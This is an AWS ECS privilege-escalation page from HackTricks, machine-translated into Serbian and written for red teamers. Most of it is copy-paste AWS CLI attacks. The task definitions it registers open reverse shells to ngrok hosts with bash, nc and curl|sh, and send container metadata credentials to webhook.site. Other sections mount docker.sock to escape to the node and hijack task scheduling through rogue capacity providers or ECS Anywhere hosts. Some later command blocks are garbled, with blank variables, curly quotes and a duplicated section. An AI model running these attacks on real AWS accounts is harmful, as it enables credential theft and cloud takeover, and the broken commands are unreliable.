AWS - ECS Privesc

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

ECS

Više informacija o ECS u:

AWS - ECS Enum

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`

Napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition i ecs:RunTask dozvolu u ECS može generate a new task definition sa malicious container koji krade metadata credentials i run it.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Kreirajte webhook koristeći sajt kao što je webhook.site


# Create file container-definition.json
[
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": [
"CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
]
}
]

# Run task definition, uploading the .json file
aws ecs register-task-definition \
--family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 \
--memory 512 \
--requires-compatibilities FARGATE \
--container-definitions file://container-definition.json

# Check the webhook for a response

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potencijalni uticaj: Direktan privesc na drugi ECS role.

`iam:PassRole`,`ecs:RunTask`

Napadač koji ima iam:PassRole i ecs:RunTask dozvole može pokrenuti novi ECS task sa izmenjenim execution role, task role i vrednostima command kontejnera. ecs run-task CLI komanda sadrži --overrides flag koji omogućava menjanje u runtime-u executionRoleArn, taskRoleArn i command kontejnera bez diranja task definition.

Navedene IAM role za taskRoleArn i executionRoleArn moraju u svom trust policy-ju dozvoliti da ih preuzme ecs-tasks.amazonaws.com.

Takođe, napadač treba da zna:

ECS cluster name
VPC Subnet
Security group (Ako nije specificirana nijedna security group, koristiće se podrazumevana)
Task Definition Name and revision
Name of the Container

aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

U gornjem isječku koda napadač menja samo vrednost taskRoleArn. Međutim, napadač mora imati dozvolu iam:PassRole nad taskRoleArn navedenim u komandi i nad executionRoleArn navedenim u definiciji taska da bi napad bio moguć.

Ako IAM rola koju napadač može proslijediti ima dovoljno privilegija za povlačenje ECR imidža i pokretanje ECS taska (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken), napadač može navesti istu IAM rolu za oba executionRoleArn i taskRoleArn u ecs run-task komandi.

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Potencijalni uticaj: Direktan privesc na bilo koji ECS task role.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`

Baš kao u prethodnom primeru, napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask dozvole u ECS može generisati novu task definition sa malicioznim containerom koji krade metadata credentials i pokrenuti je.
Međutim, u ovom slučaju, potreban je container instance da bi se maliciozna task definition pokrenula.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential Impact: Direktan privesc na bilo koji ECS role.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`

Baš kao u prethodnom primeru, napadač koji zloupotrebljava dozvole iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService ili ecs:CreateService u ECS može generisati novu task definition sa zlonamernim containerom koji ukrade metadata credentials i pokrenuti je kreiranjem novog servisa sa najmanje jednom task-om koji radi.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potencijalni uticaj: Direktan privesc na bilo koju ECS ulogu.

`iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`

U stvari, samo sa tim dozvolama moguće je koristiti overrides da se izvrše proizvoljne komande u kontejneru sa proizvoljnom ulogom, koristeći nešto poput:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potencijalni uticaj: Direktan privesc na bilo koju ECS ulogu.

`ecs:RegisterTaskDefinition`, `(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Ovaj scenarij je sličan prethodnim, ali bez dozvole iam:PassRole.
Ovo je i dalje interesantno jer, ako možete pokrenuti proizvoljan kontejner, čak i bez role, mogli biste pokrenuti privilegovani kontejner da pobegnete na čvor i ukrasti EC2 IAM role i uloge drugih ECS kontejnera koji se izvršavaju na tom čvoru.
Možete čak i primorati druge zadatke da se pokreću unutar EC2 instance koju kompromitujete kako biste ukrali njihove kredencijale (kao što je objašnjeno u Privesc to node section).

Warning

Ovaj napad je moguć samo ako ECS cluster koristi EC2 instance, a ne Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

`ecs:ExecuteCommand`, `ecs:DescribeTasks,``(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Napadač sa ecs:ExecuteCommand, ecs:DescribeTasks može izvršavati komande unutar pokrenutog kontejnera i izvući IAM rolu pridruženu tom kontejneru (potrebna su vam describe dozvole jer su neophodne za pokretanje aws ecs execute-command).
Međutim, da bi se to uradilo, instanca kontejnera mora imati pokrenut ExecuteCommand agent (koji po defaultu nije pokrenut).

Stoga napadač može pokušati:

Pokušati pokrenuti komandu u svakom pokrenutom kontejneru

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

Ako on ima ecs:RunTask, pokreni task sa aws ecs run-task --enable-execute-command [...]
Ako on ima ecs:StartTask, pokreni task sa aws ecs start-task --enable-execute-command [...]
Ako on ima ecs:CreateService, kreiraj service sa aws ecs create-service --enable-execute-command [...]
Ako on ima ecs:UpdateService, ažuriraj service sa aws ecs update-service --enable-execute-command [...]

Možeš naći primere tih opcija u prethodnim ECS privesc sekcijama.

Potencijalni uticaj: Privesc na drugu ulogu pridruženu kontejnerima.

`ssm:StartSession`

Proveri na ssm privesc stranici kako možeš zloupotrebiti ovu dozvolu da privesc na ECS:

AWS - SSM Privesc

`iam:PassRole`, `ec2:RunInstances`

Proveri na ec2 privesc stranici kako možeš zloupotrebiti ove dozvole da privesc na ECS:

AWS - EC2 Privesc

`ecs:RegisterContainerInstance`, `ecs:DeregisterContainerInstance`, `ecs:StartTask`, `iam:PassRole`

Napadač sa ovim dozvolama bi potencijalno mogao registrovati EC2 instancu u ECS klasteru i pokretati taskove na njoj. Ovo bi napadaču omogućilo izvršavanje proizvoljnog koda u kontekstu ECS taskova.

TODO: Da li je moguće registrovati instancu iz drugog AWS naloga tako da se taskovi izvršavaju na mašinama kojima napadač upravlja??

`ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`

Note

TODO: Testirati ovo

Napadač sa dozvolama ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet i ecs:DescribeTaskSets može kreirati zlonamerni task set za postojeći ECS service i ažurirati primary task set. Ovo napadaču omogućava da izvršava proizvoljan kod unutar servisa.

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Potencijalni uticaj: Izvršavanje proizvoljnog koda u pogođenoj usluzi, što može uticati na njenu funkcionalnost ili dovesti do eksfiltracije osetljivih podataka.

References

https://ruse.tech/blogs/ecs-attack-methods

Preuzimanje raspoređivanja ECS pomoću zlonamernog Capacity Provider-a (EC2 ASG takeover)

Napadač sa dozvolama za upravljanje ECS capacity provider-ima i ažuriranje servisa može kreirati EC2 Auto Scaling Group koju kontroliše, umotati je u ECS Capacity Provider, povezati je sa ciljanim cluster-om i migrirati servis žrtve da koristi tog provider-a. Tasks će tada biti raspoređeni na EC2 instance pod kontrolom napadača, omogućavajući pristup na nivou OS-a za inspekciju kontejnera i krađu task role credentials.

Commands (us-east-1):

Preduvjeti
Kreirajte Launch Template za ECS agent da se pridruži target cluster-u
Kreirajte Auto Scaling Group
Kreirajte Capacity Provider iz ASG-a
Povežite Capacity Provider sa cluster-om (opciono kao podrazumevani)
Migrirajte servis na vaš provider
Proverite da li tasks dospevaju na instance koje kontroliše napadač
Opcionalno: sa EC2 noda, docker exec u target kontejnere i pročitajte http://169.254.170.2 da biste dobili task role credentials.
Čišćenje

Potencijalni uticaj: EC2 nodovi pod kontrolom napadača primaju zadatke žrtve, omogućavajući pristup na nivou OS-a kontejnerima i krađu task IAM role credentials.

Step-by-step commands (copy/paste)

export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true
VPC=vpc-18e6ac62
SUBNETS=
AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=
ASG_ARN=
CP_NAME=htcp-8797
aws ecs create-capacity-provider –name  –auto-scaling-group-provider “autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED”
aws ecs put-cluster-capacity-providers –cluster “” –capacity-providers  –default-capacity-provider-strategy capacityProvider=,weight=1
SVC=
Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service –cluster “” –service “” –capacity-provider-strategy capacityProvider=,weight=1 –force-new-deployment
TASK=
CI=
aws ecs describe-container-instances –cluster “” –container-instances “” –query containerInstances[0].ec2InstanceId –output text


Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
Iskoristite ECS Anywhere da registrujete host pod kontrolom napadača kao EXTERNAL container instance u ciljnom ECS cluster-u i pokrenete tasks na tom hostu koristeći privilegovane task i execution role. Ovo daje kontrolu na nivou OS-a nad tim gde se tasks izvršavaju (vaš sopstveni računar) i omogućava krađu kredencijala/podataka iz tasks i priključenih volumena bez diranja capacity provider-a ili ASG-ova.


Zahtevane dozvole (primer minimalno):


ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask


ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation


iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)


logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)


Impact: Run arbitrary containers with chosen taskRoleArn on attacker host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; access any volumes mounted by tasks; stealthier than manipulating capacity providers/ASGs.


Steps

Create/identify cluster (us-east-1)

aws ecs create-cluster --cluster-name ht-ecs-anywhere


Kreiraj ECS Anywhere ulogu i SSM aktivaciju (za on-prem/EXTERNAL instancu)

aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)


Postaviti napadački host i automatski ga registrovati kao EXTERNAL (na primer: mali AL2 EC2 kao “on‑prem”)


user-data.sh
```bash
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
```

```bash
AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID
```
4) Proverite da li se EXTERNAL container instance pridružio
```bash
aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances  --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external
```
5) Kreiraj task/execution roles, registruj EXTERNAL task definition, i pokreni ga na attacker host
```bash
# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role
task def (EXTERNAL launch)
cat > td-external.json << ‘JSON’
{
“family”: “ht-external”,
“requiresCompatibilities”: [ “EXTERNAL” ],
“networkMode”: “bridge”,
“memory”: “256”,
“cpu”: “128”,
“executionRoleArn”: “arn:aws:iam:::role/ht-ecs-task-exec”,
“taskRoleArn”: “arn:aws:iam:::role/ht-ecs-task-role”,
“containerDefinitions”: [
{“name”:“steal”,“image”:“public.ecr.aws/amazonlinux/amazonlinux:latest”,
“entryPoint”:[“/bin/sh”,“-c”],
“command”:[“REL=$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2$REL; sleep 600”],
“memory”: 128,
“logConfiguration”:{“logDriver”:“awslogs”,“options”:{“awslogs-region”:“us-east-1”,“awslogs-group”:“/ht/ecs/anywhere”,“awslogs-stream-prefix”:“steal”}}
}
]
}
JSON
aws logs create-log-group –log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition –cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances –cluster ht-ecs-anywhere –query ‘containerInstanceArns[0]’ –output text)
aws ecs start-task –cluster ht-ecs-anywhere –task-definition ht-external 
–container-instances $CI
6) Odatle kontrolišete host koji pokreće tasks. Možete čitati task logs (if awslogs) ili direktno exec-ovati na hostu da biste eksfiltrirali credentials/data iz svojih tasks.



#### Command example (placeholders)




### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

Napadač koji ima dozvole za upravljanje ECS capacity providers i ažuriranje servisa može kreirati EC2 Auto Scaling Group koju kontroliše, umotati je u ECS Capacity Provider, povezati je sa target cluster-om i migrirati victim service da koristi tog providera. Tasks će potom biti raspoređeni na EC2 instance pod kontrolom napadača, što omogućava OS-level pristup za pregled containera i krađu task role credentials.

Commands (us-east-1):

- Preduslovi



- Create Launch Template for ECS agent to join target cluster



- Kreirajte Auto Scaling Group



- Kreirajte Capacity Provider iz ASG-a



- Povežite Capacity Provider sa cluster-om (opciono kao default)



- Migrirajte service da koristi vaš provider



- Verifikujte da tasks završavaju na instance napadača



- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.

- Čišćenje



**Potencijalni uticaj:** EC2 čvorovi pod kontrolom napadača dobijaju victim tasks, omogućavajući OS-level pristup containerima i krađu task IAM role credentials.
> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>